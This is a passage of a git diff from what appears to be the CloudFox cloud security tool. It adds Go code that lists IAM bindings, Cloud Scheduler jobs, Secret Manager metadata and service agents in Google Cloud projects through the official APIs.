dataset.DatasetID, + ProjectID: projectID, + Role: string(access.Role), + Member: member, + MemberType: memberType, + MemberEmail: extractEmail(member), + IsPublic: isPublic, + } + bindings = append(bindings, binding) + } + } + + return bindings, nil +} + +// GetPubSubIAM enumerates IAM policies on Pub/Sub topics and subscriptions +func (s *ResourceIAMService) GetPubSubIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *pubsub.Client + var err error + if s.session != nil { + 
client, err = pubsub.NewClient(ctx, projectID, s.getClientOption()) + } else { + client, err = pubsub.NewClient(ctx, projectID) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "pubsub.googleapis.com") + } + defer client.Close() + + // List topics + topicIt := client.Topics(ctx) + for { + topic, err := topicIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this topic + policy, err := topic.IAM().Policy(ctx) + if err != nil { + continue + } + + topicID := topic.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "topic", + ResourceName: fmt.Sprintf("projects/%s/topics/%s", projectID, topicID), + ResourceID: topicID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + // List subscriptions + subIt := client.Subscriptions(ctx) + for { + sub, err := subIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this subscription + policy, err := sub.IAM().Policy(ctx) + if err != nil { + continue + } + + subID := sub.ID() + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "subscription", + ResourceName: fmt.Sprintf("projects/%s/subscriptions/%s", projectID, subID), + ResourceID: subID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + + return bindings, nil +} + +// GetSecretManagerIAM enumerates IAM policies on Secret Manager secrets +func (s *ResourceIAMService) GetSecretManagerIAM(ctx context.Context, 
projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + smService, err := s.getSecretManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + // List secrets (with pagination) + parent := fmt.Sprintf("projects/%s", projectID) + pageToken := "" + var allSecrets []*secretmanager.Secret + for { + call := smService.Projects.Secrets.List(parent).Context(ctx) + if pageToken != "" { + call = call.PageToken(pageToken) + } + resp, err := call.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + allSecrets = append(allSecrets, resp.Secrets...) + if resp.NextPageToken == "" { + break + } + pageToken = resp.NextPageToken + } + + for _, secret := range allSecrets { + // Get IAM policy for this secret + policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Context(ctx).Do() + if err != nil { + continue + } + + secretID := extractSecretID(secret.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "secret", + ResourceName: secret.Name, + ResourceID: secretID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// GetKMSIAM enumerates IAM policies on KMS keys +func (s *ResourceIAMService) GetKMSIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + var client *kms.KeyManagementClient + var err error + if s.session != nil { + client, err = kms.NewKeyManagementClient(ctx, s.getClientOption()) + } else { + client, err 
= kms.NewKeyManagementClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + defer client.Close() + + // Get regions from regionService (with automatic fallback) plus global and multi-region locations + regions := regionservice.GetCachedRegionNames(ctx, projectID) + // Add global and multi-region locations that KMS supports + locations := append([]string{"global", "us", "eu", "asia"}, regions...) + + for _, location := range locations { + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, location) + + keyRingIt := client.ListKeyRings(ctx, &kmspb.ListKeyRingsRequest{Parent: parent}) + for { + keyRing, err := keyRingIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // List keys in this key ring + keyIt := client.ListCryptoKeys(ctx, &kmspb.ListCryptoKeysRequest{Parent: keyRing.Name}) + for { + key, err := keyIt.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Get IAM policy for this key + policy, err := client.ResourceIAM(key.Name).Policy(ctx) + if err != nil { + continue + } + + keyID := extractKeyID(key.Name) + for _, role := range policy.Roles() { + for _, member := range policy.Members(role) { + binding := ResourceIAMBinding{ + ResourceType: "cryptoKey", + ResourceName: key.Name, + ResourceID: keyID, + ProjectID: projectID, + Role: string(role), + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + bindings = append(bindings, binding) + } + } + } + } + } + + return bindings, nil +} + +// GetCloudFunctionsIAM enumerates IAM policies on Cloud Functions +func (s *ResourceIAMService) GetCloudFunctionsIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + cfService, err := s.getCloudFunctionsService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, 
"cloudfunctions.googleapis.com") + } + + // List functions across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := cfService.Projects.Locations.Functions.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudfunctions.googleapis.com") + } + + for _, fn := range resp.Functions { + // Get IAM policy for this function + policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Context(ctx).Do() + if err != nil { + continue + } + + fnID := extractFunctionID(fn.Name) + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "function", + ResourceName: fn.Name, + ResourceID: fnID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// GetCloudRunIAM enumerates IAM policies on Cloud Run services +func (s *ResourceIAMService) GetCloudRunIAM(ctx context.Context, projectID string) ([]ResourceIAMBinding, error) { + var bindings []ResourceIAMBinding + + runService, err := s.getCloudRunService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + // List services across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "run.googleapis.com") + } + + for _, svc := range resp.Items { + // Get IAM policy for this service + policy, err := runService.Projects.Locations.Services.GetIamPolicy(svc.Metadata.Name).Context(ctx).Do() + if 
err != nil { + continue + } + + svcID := svc.Metadata.Name + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + b := ResourceIAMBinding{ + ResourceType: "cloudrun", + ResourceName: svc.Metadata.Name, + ResourceID: svcID, + ProjectID: projectID, + Role: binding.Role, + Member: member, + MemberType: determineMemberType(member), + MemberEmail: extractEmail(member), + IsPublic: isPublicMember(member), + } + if binding.Condition != nil { + b.HasCondition = true + b.ConditionTitle = binding.Condition.Title + b.ConditionExpression = binding.Condition.Expression + } + bindings = append(bindings, b) + } + } + } + + return bindings, nil +} + +// Helper functions + +func determineMemberType(member string) string { + switch { + case member == "allUsers": + return "allUsers" + case member == "allAuthenticatedUsers": + return "allAuthenticatedUsers" + case strings.HasPrefix(member, "user:"): + return "User" + case strings.HasPrefix(member, "serviceAccount:"): + return "ServiceAccount" + case strings.HasPrefix(member, "group:"): + return "Group" + case strings.HasPrefix(member, "domain:"): + return "Domain" + case strings.HasPrefix(member, "principal:"): + return "Federated" + case strings.HasPrefix(member, "principalSet:"): + return "FederatedSet" + default: + return "Unknown" + } +} + +func extractEmail(member string) string { + if strings.Contains(member, ":") { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + } + return member +} + +func isPublicMember(member string) bool { + return member == "allUsers" || member == "allAuthenticatedUsers" +} + +func extractSecretID(name string) string { + // Format: projects/{project}/secrets/{secret} + parts := strings.Split(name, "/") + if len(parts) >= 4 { + return parts[len(parts)-1] + } + return name +} + +func extractKeyID(name string) string { + // Format: projects/{project}/locations/{location}/keyRings/{keyring}/cryptoKeys/{key} + parts := 
strings.Split(name, "/") + if len(parts) >= 8 { + return parts[len(parts)-1] + } + return name +} + +func extractFunctionID(name string) string { + // Format: projects/{project}/locations/{location}/functions/{function} + parts := strings.Split(name, "/") + if len(parts) >= 6 { + return parts[len(parts)-1] + } + return name +} diff --git a/gcp/services/schedulerService/schedulerService.go b/gcp/services/schedulerService/schedulerService.go new file mode 100644 index 00000000..d9355e96 --- /dev/null +++ b/gcp/services/schedulerService/schedulerService.go @@ -0,0 +1,220 @@ +package schedulerservice + +import ( + "context" + "fmt" + "strings" + "sync" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + scheduler "google.golang.org/api/cloudscheduler/v1" +) + +type SchedulerService struct{ + session *gcpinternal.SafeSession +} + +func New() *SchedulerService { + return &SchedulerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *SchedulerService { + return &SchedulerService{ + session: session, + } +} + +// JobInfo holds Cloud Scheduler job details with security-relevant information +type JobInfo struct { + Name string + ProjectID string + Location string + Description string + State string // ENABLED, PAUSED, DISABLED, UPDATE_FAILED + Schedule string // Cron expression + TimeZone string + + // Target configuration + TargetType string // http, pubsub, appengine + TargetURI string // For HTTP targets + TargetHTTPMethod string // For HTTP targets + TargetTopic string // For Pub/Sub targets + TargetService string // For App Engine targets + TargetVersion string // For App Engine targets + + // Authentication + ServiceAccount string // OIDC or OAuth service account + AuthType string // OIDC, OAuth, or none + + // Retry configuration + RetryCount int64 + MaxRetryDuration string + MaxBackoff string + + // Timing + 
LastAttemptTime string + ScheduleTime string + Status string // Last attempt status +} + +// getService returns a Cloud Scheduler service client using cached session if available +func (ss *SchedulerService) getService(ctx context.Context) (*scheduler.Service, error) { + if ss.session != nil { + return sdk.CachedGetSchedulerService(ctx, ss.session) + } + return scheduler.NewService(ctx) +} + +// Jobs retrieves all Cloud Scheduler jobs in a project across all regions +// Note: The Cloud Scheduler API does NOT support the "-" wildcard for locations +// so we must iterate through regions explicitly +func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { + ctx := context.Background() + + service, err := ss.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") + } + + var jobs []JobInfo + var mu sync.Mutex + var wg sync.WaitGroup + var lastErr error + var errMu sync.Mutex + + // Use a semaphore to limit concurrent API calls + semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + + // Iterate through all Scheduler regions in parallel + for _, region := range regions { + wg.Add(1) + go func(region string) { + defer wg.Done() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, region) + + call := service.Projects.Locations.Jobs.List(parent) + err := call.Pages(ctx, func(page *scheduler.ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + mu.Lock() + jobs = append(jobs, info) + mu.Unlock() + } + return nil + }) + + if err != nil { + // Track the last error but continue - region may not have jobs or API may not be enabled + errMu.Lock() + lastErr = err + errMu.Unlock() + } + }(region) + } + + wg.Wait() + + // Only 
return error if we got no jobs AND had errors + // If we found jobs in some regions, that's success + if len(jobs) == 0 && lastErr != nil { + return nil, gcpinternal.ParseGCPError(lastErr, "cloudscheduler.googleapis.com") + } + + return jobs, nil +} + +// parseJobInfo extracts relevant information from a Cloud Scheduler job +func parseJobInfo(job *scheduler.Job, projectID string) JobInfo { + info := JobInfo{ + Name: extractName(job.Name), + ProjectID: projectID, + Description: job.Description, + State: job.State, + Schedule: job.Schedule, + TimeZone: job.TimeZone, + } + + // Extract location from job name + // Format: projects/{project}/locations/{location}/jobs/{name} + parts := strings.Split(job.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + // Parse target configuration + if job.HttpTarget != nil { + info.TargetType = "http" + info.TargetURI = job.HttpTarget.Uri + info.TargetHTTPMethod = job.HttpTarget.HttpMethod + + // Check for OIDC token + if job.HttpTarget.OidcToken != nil { + info.AuthType = "OIDC" + info.ServiceAccount = job.HttpTarget.OidcToken.ServiceAccountEmail + } + + // Check for OAuth token + if job.HttpTarget.OauthToken != nil { + info.AuthType = "OAuth" + info.ServiceAccount = job.HttpTarget.OauthToken.ServiceAccountEmail + } + } + + if job.PubsubTarget != nil { + info.TargetType = "pubsub" + info.TargetTopic = extractName(job.PubsubTarget.TopicName) + } + + if job.AppEngineHttpTarget != nil { + info.TargetType = "appengine" + info.TargetURI = job.AppEngineHttpTarget.RelativeUri + info.TargetHTTPMethod = job.AppEngineHttpTarget.HttpMethod + if job.AppEngineHttpTarget.AppEngineRouting != nil { + info.TargetService = job.AppEngineHttpTarget.AppEngineRouting.Service + info.TargetVersion = job.AppEngineHttpTarget.AppEngineRouting.Version + } + } + + // Retry configuration + if job.RetryConfig != nil { + info.RetryCount = job.RetryConfig.RetryCount + info.MaxRetryDuration = job.RetryConfig.MaxRetryDuration + info.MaxBackoff = 
job.RetryConfig.MaxBackoffDuration + } + + // Timing info + info.LastAttemptTime = job.LastAttemptTime + info.ScheduleTime = job.ScheduleTime + if job.Status != nil { + info.Status = formatJobStatus(job.Status) + } + + return info +} + +// formatJobStatus formats the job status for display +func formatJobStatus(status *scheduler.Status) string { + if status.Code == 0 { + return "OK" + } + return fmt.Sprintf("Error %d: %s", status.Code, status.Message) +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/secretsService/secretsService.go b/gcp/services/secretsService/secretsService.go index 75b9f510..e621e5aa 100644 --- a/gcp/services/secretsService/secretsService.go +++ b/gcp/services/secretsService/secretsService.go @@ -2,11 +2,19 @@ package secretservice import ( "context" + "encoding/json" "fmt" + "io" + "net/http" + "strings" + "time" secretmanager "cloud.google.com/go/secretmanager/apiv1" secretmanagerpb "cloud.google.com/go/secretmanager/apiv1/secretmanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "github.com/googleapis/gax-go/v2" + "golang.org/x/oauth2/google" "google.golang.org/api/iterator" ) @@ -18,6 +26,8 @@ type Iterator interface { type SecretsManagerClientWrapper struct { Closer func() error SecretLister func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator + IAMGetter func(ctx context.Context, secretName string) (*secretmanagerpb.Secret, error) + rawClient *secretmanager.Client } func (w *SecretsManagerClientWrapper) Close() error { @@ -26,14 +36,22 @@ func (w *SecretsManagerClientWrapper) Close() error { func (w *SecretsManagerClientWrapper) ListSecrets(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts 
...gax.CallOption) Iterator { return w.SecretLister(ctx, req, opts...) - } type SecretsService struct { - Client *SecretsManagerClientWrapper + Client *SecretsManagerClientWrapper + session *gcpinternal.SafeSession +} + +// getClient returns a cached Secret Manager client +func (s *SecretsService) getClient(ctx context.Context) (*secretmanager.Client, error) { + if s.session != nil { + return sdk.CachedGetSecretManagerClient(ctx, s.session) + } + return secretmanager.NewClient(ctx) } -// New function to facilitate using the ss client +// New creates a SecretsService with the provided client func New(client *secretmanager.Client) SecretsService { ss := SecretsService{ Client: &SecretsManagerClientWrapper{ @@ -41,17 +59,82 @@ func New(client *secretmanager.Client) SecretsService { SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { return client.ListSecrets(ctx, req, opts...) }, + rawClient: client, }, } return ss } +// NewWithSession creates a SecretsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (SecretsService, error) { + ctx := context.Background() + ss := SecretsService{ + session: session, + } + + client, err := ss.getClient(ctx) + if err != nil { + return SecretsService{}, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + ss.Client = &SecretsManagerClientWrapper{ + Closer: client.Close, + SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { + return client.ListSecrets(ctx, req, opts...) 
+ }, + rawClient: client, + } + return ss, nil +} + +// IAMBinding represents a single IAM binding on a secret +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// SecretInfo contains secret metadata and security-relevant configuration type SecretInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectID"` - CreationTime string `json:"creationTime"` - Labels map[string]string `json:"labels"` - Rotation string `json:"rotation,omitempty"` + // Basic info + Name string `json:"name"` + ProjectID string `json:"projectID"` + + // Timestamps + CreationTime string `json:"creationTime"` + + // Replication + ReplicationType string `json:"replicationType"` // "automatic" or "user-managed" + ReplicaLocations []string `json:"replicaLocations,omitempty"` // Locations for user-managed replication + + // Encryption + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName,omitempty"` // KMS key for CMEK + + // Expiration + HasExpiration bool `json:"hasExpiration"` + ExpireTime string `json:"expireTime,omitempty"` + TTL string `json:"ttl,omitempty"` + + // Rotation + Rotation string `json:"rotation,omitempty"` + NextRotationTime string `json:"nextRotationTime,omitempty"` + RotationPeriod string `json:"rotationPeriod,omitempty"` + + // Version Management + VersionDestroyTTL string `json:"versionDestroyTtl,omitempty"` // Delayed destruction + + // Metadata + Labels map[string]string `json:"labels,omitempty"` + Annotations map[string]string `json:"annotations,omitempty"` + + // Topics (Pub/Sub notifications) + Topics []string `json:"topics,omitempty"` + + // Version Aliases + VersionAliases map[string]int64 `json:"versionAliases,omitempty"` + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings,omitempty"` } func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { @@ -63,21 +146,234 @@ func (ss *SecretsService) Secrets(projectID string) 
([]SecretInfo, error) { ctx := context.Background() it := ss.Client.ListSecrets(ctx, req) for { - resp, err := it.Next() //Here it errors out + resp, err := it.Next() if err == iterator.Done { break } if err != nil { - return nil, fmt.Errorf("failed to list secrets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") } - secrets = append(secrets, SecretInfo{ + secret := SecretInfo{ Name: resp.Name, ProjectID: projectID, - CreationTime: resp.CreateTime.AsTime().String(), + CreationTime: resp.CreateTime.AsTime().Format(time.RFC3339), Labels: resp.Labels, - Rotation: resp.Rotation.String(), - }) + Annotations: resp.Annotations, + } + + // Parse replication type + if resp.Replication != nil { + switch r := resp.Replication.Replication.(type) { + case *secretmanagerpb.Replication_Automatic_: + secret.ReplicationType = "automatic" + // Check for CMEK in automatic replication + if r.Automatic != nil && r.Automatic.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = r.Automatic.CustomerManagedEncryption.KmsKeyName + } else { + secret.EncryptionType = "Google-managed" + } + case *secretmanagerpb.Replication_UserManaged_: + secret.ReplicationType = "user-managed" + if r.UserManaged != nil { + for _, replica := range r.UserManaged.Replicas { + secret.ReplicaLocations = append(secret.ReplicaLocations, replica.Location) + // Check for CMEK in user-managed replication + if replica.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = replica.CustomerManagedEncryption.KmsKeyName + } + } + } + if secret.EncryptionType == "" { + secret.EncryptionType = "Google-managed" + } + } + } + + // Parse expiration + if resp.Expiration != nil { + secret.HasExpiration = true + switch e := resp.Expiration.(type) { + case *secretmanagerpb.Secret_ExpireTime: + if e.ExpireTime != nil { + secret.ExpireTime = e.ExpireTime.AsTime().Format(time.RFC3339) + } + case *secretmanagerpb.Secret_Ttl: + 
if e.Ttl != nil { + secret.TTL = e.Ttl.AsDuration().String() + } + } + } + + // Parse rotation + if resp.Rotation != nil { + secret.Rotation = "enabled" + if resp.Rotation.NextRotationTime != nil { + secret.NextRotationTime = resp.Rotation.NextRotationTime.AsTime().Format(time.RFC3339) + } + if resp.Rotation.RotationPeriod != nil { + secret.RotationPeriod = resp.Rotation.RotationPeriod.AsDuration().String() + } + } else { + secret.Rotation = "disabled" + } + + // Get VersionDestroyTTL via REST API (may not be available in all SDK versions) + ss.enrichSecretFromRestAPI(ctx, &secret) + + // Parse topics + if len(resp.Topics) > 0 { + for _, topic := range resp.Topics { + secret.Topics = append(secret.Topics, topic.Name) + } + } + + // Parse version aliases + if len(resp.VersionAliases) > 0 { + secret.VersionAliases = resp.VersionAliases + } + + // Get IAM policy for the secret + iamBindings := ss.getSecretIAMPolicy(ctx, resp.Name) + secret.IAMBindings = iamBindings + + secrets = append(secrets, secret) } return secrets, nil } + +// getSecretIAMPolicy retrieves the IAM policy for a secret +func (ss *SecretsService) getSecretIAMPolicy(ctx context.Context, secretName string) []IAMBinding { + var bindings []IAMBinding + + if ss.Client.rawClient == nil { + return bindings + } + + // Get IAM policy using the raw client + policy, err := ss.Client.rawClient.IAM(secretName).Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) 
+ return bindings + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + } + bindings = append(bindings, binding) + } + } + + return bindings +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// secretAPIResponse represents the raw JSON response from Secret Manager API +// to capture fields that may not be in the SDK yet +type secretAPIResponse struct { + VersionDestroyTtl string `json:"versionDestroyTtl,omitempty"` +} + +// enrichSecretFromRestAPI fetches additional secret fields via direct HTTP request +// that may not be available in the Go SDK version +func (ss *SecretsService) enrichSecretFromRestAPI(ctx context.Context, secret *SecretInfo) { + var accessToken string + + // Try to use session token if available + if ss.session != nil { + token, err := ss.session.GetToken(ctx) + if err == nil { + accessToken = token + } + } + + // Fall back to default credentials if no session token + if accessToken == "" { + creds, err := google.FindDefaultCredentials(ctx, "https://www.googleapis.com/auth/cloud-platform") + if err != nil { + return + } + token, err := creds.TokenSource.Token() + if err != nil { + return + } + accessToken 
= token.AccessToken + } + + // Build the API URL + // Secret name format: projects/{project}/secrets/{secret} + url := fmt.Sprintf("https://secretmanager.googleapis.com/v1/%s", secret.Name) + + // Create request + req, err := http.NewRequestWithContext(ctx, "GET", url, nil) + if err != nil { + return + } + req.Header.Set("Authorization", "Bearer "+accessToken) + + // Make request + client := &http.Client{} + resp, err := client.Do(req) + if err != nil { + return + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return + } + + // Read response body + body, err := io.ReadAll(resp.Body) + if err != nil { + return + } + + // Parse JSON + var apiResp secretAPIResponse + if err := json.Unmarshal(body, &apiResp); err != nil { + return + } + + // Parse VersionDestroyTTL + if apiResp.VersionDestroyTtl != "" { + // Parse duration string (e.g., "86400s" for 1 day) + if dur, err := time.ParseDuration(apiResp.VersionDestroyTtl); err == nil { + secret.VersionDestroyTTL = dur.String() + } else { + // If parsing fails, use the raw value + secret.VersionDestroyTTL = apiResp.VersionDestroyTtl + } + } +} diff --git a/gcp/services/secretsService/secretsService_test.go b/gcp/services/secretsService/secretsService_test.go index a8e63898..dca529fe 100644 --- a/gcp/services/secretsService/secretsService_test.go +++ b/gcp/services/secretsService/secretsService_test.go @@ -115,8 +115,9 @@ func TestSecrets(t *testing.T) { { Name: "projects/my-project/secrets/secret1", ProjectID: "my-project", - CreationTime: time.Date(2020, 1, 1, 0, 0, 0, 0, time.UTC).String(), + CreationTime: time.Date(2020, 1, 1, 0, 0, 0, 0, time.UTC).Format(time.RFC3339), Labels: map[string]string{"env": "test"}, + Rotation: "disabled", }, }, wantErr: false, diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go new file mode 100644 index 00000000..fbc209bd --- /dev/null +++ 
b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -0,0 +1,335 @@ +package serviceagentsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +type ServiceAgentsService struct{ + session *gcpinternal.SafeSession +} + +func New() *ServiceAgentsService { + return &ServiceAgentsService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *ServiceAgentsService { + return &ServiceAgentsService{ + session: session, + } +} + +// ServiceAgentInfo represents a Google-managed service agent +type ServiceAgentInfo struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + SourceProject string `json:"sourceProject"` // Project the agent belongs to (extracted from email) + ServiceName string `json:"serviceName"` + AgentType string `json:"agentType"` // compute, gke, cloudbuild, etc. 
+ Roles []string `json:"roles"` + IsCrossProject bool `json:"isCrossProject"` + Description string `json:"description"` +} + +// KnownServiceAgents maps service agent patterns to their descriptions +var KnownServiceAgents = map[string]struct { + Service string + Description string +}{ + "@cloudservices.gserviceaccount.com": { + Service: "Google APIs", + Description: "Google APIs Service Agent - manages resources on behalf of Google Cloud services", + }, + "@compute-system.iam.gserviceaccount.com": { + Service: "Compute Engine", + Description: "Compute Engine Service Agent - manages Compute Engine resources", + }, + "@container-engine-robot.iam.gserviceaccount.com": { + Service: "GKE", + Description: "Kubernetes Engine Service Agent - manages GKE clusters", + }, + "@cloudbuild.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Account - runs build jobs", + }, + "@gcp-sa-cloudbuild.iam.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Agent - manages Cloud Build resources", + }, + "@cloudcomposer-accounts.iam.gserviceaccount.com": { + Service: "Composer", + Description: "Cloud Composer Service Agent - manages Airflow environments", + }, + "@dataflow-service-producer-prod.iam.gserviceaccount.com": { + Service: "Dataflow", + Description: "Dataflow Service Agent - manages Dataflow jobs", + }, + "@gcp-sa-dataproc.iam.gserviceaccount.com": { + Service: "Dataproc", + Description: "Dataproc Service Agent - manages Dataproc clusters", + }, + "@gcp-sa-pubsub.iam.gserviceaccount.com": { + Service: "Pub/Sub", + Description: "Pub/Sub Service Agent - manages Pub/Sub resources", + }, + "@serverless-robot-prod.iam.gserviceaccount.com": { + Service: "Cloud Run/Functions", + Description: "Serverless Service Agent - manages serverless resources", + }, + "@gcp-sa-cloudscheduler.iam.gserviceaccount.com": { + Service: "Cloud Scheduler", + Description: "Cloud Scheduler Service Agent", + }, + 
"@gcp-sa-bigquery.iam.gserviceaccount.com": { + Service: "BigQuery", + Description: "BigQuery Service Agent - manages BigQuery resources", + }, + "@gcp-sa-artifactregistry.iam.gserviceaccount.com": { + Service: "Artifact Registry", + Description: "Artifact Registry Service Agent", + }, + "@gcp-sa-secretmanager.iam.gserviceaccount.com": { + Service: "Secret Manager", + Description: "Secret Manager Service Agent", + }, + "@gcp-sa-firestore.iam.gserviceaccount.com": { + Service: "Firestore", + Description: "Firestore Service Agent", + }, + "@gcp-sa-cloud-sql.iam.gserviceaccount.com": { + Service: "Cloud SQL", + Description: "Cloud SQL Service Agent", + }, + "@gcp-sa-logging.iam.gserviceaccount.com": { + Service: "Cloud Logging", + Description: "Cloud Logging Service Agent", + }, + "@gcp-sa-monitoring.iam.gserviceaccount.com": { + Service: "Cloud Monitoring", + Description: "Cloud Monitoring Service Agent", + }, +} + +// getResourceManagerService returns a Cloud Resource Manager service client using cached session if available +func (s *ServiceAgentsService) getResourceManagerService(ctx context.Context) (*cloudresourcemanager.Service, error) { + if s.session != nil { + return sdk.CachedGetResourceManagerService(ctx, s.session) + } + return cloudresourcemanager.NewService(ctx) +} + +// GetServiceAgents retrieves all service agents with IAM bindings. +// If orgCache is provided, it resolves project numbers to IDs for accurate cross-project detection. 
